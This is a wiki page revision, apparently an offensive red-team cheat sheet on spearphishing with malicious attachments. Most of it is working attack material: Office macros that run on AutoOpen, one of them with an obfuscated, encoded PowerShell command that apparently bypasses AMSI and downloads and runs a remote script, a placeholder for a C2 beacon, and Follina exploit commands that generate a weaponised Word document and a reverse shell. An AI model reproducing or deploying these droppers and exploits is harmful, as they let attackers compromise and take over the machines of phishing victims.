No edit summary |
|||
Line 29: | Line 29: | ||
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") | Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") | ||
proc.Create "powershell <beacon line generated> | proc.Create "powershell <beacon line generated> | ||
</syntaxhighlight> | </syntaxhighlight>Also see: | ||
[https://github.com/christophetd/spoofing-office-macro Spoofing Office Macro] | |||
[https://github.com/cedowens/Mythic-Macro-Generator Mythic Macro Generator] | |||
[https://github.com/cldrn/macphish Mac Phish] | |||
=== Follina === | === Follina === | ||
https://github.com/JohnHammond/msdt-follina | [https://github.com/JohnHammond/msdt-follina Follina by John Hammond] | ||
<syntaxhighlight lang="bash"> | <syntaxhighlight lang="bash"> | ||
# Calc.exe | # Calc.exe | ||
Line 43: | Line 47: | ||
python3 follina.py -r 9001 | python3 follina.py -r 9001 | ||
</syntaxhighlight> | </syntaxhighlight> | ||
[[category:Phishing for Information]] | [[category:Phishing for Information]] |
Revision as of 09:51, 21 January 2023
Description
Attackers may use spearphishing tactics to trick individuals into revealing sensitive information by sending an email with a malicious attachment. This type of spearphishing, known as "spearphishing for information," is an attempt to trick targets into divulging information, frequently credentials or other actionable information. This type of spearphishing is targeted at a specific individual, company or industry, and the attackers attach a file to the email and rely on the recipient to populate information and return the file. The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. They may also use information gathered from previous reconnaissance efforts such as searching open websites or the victim's website to create convincing and believable lures.
Office Documents
Macro Examples
Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub
Sub AutoOpen()
Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"
End Sub
Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1
Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>
Also see:
Spoofing Office Macro Mythic Macro Generator Mac Phish
Follina
# Calc.exe
python3 follina.py
# notepad
python3 follina.py -c "notepad"
# Reverse Shell + Generated word.doc
python3 follina.py -r 9001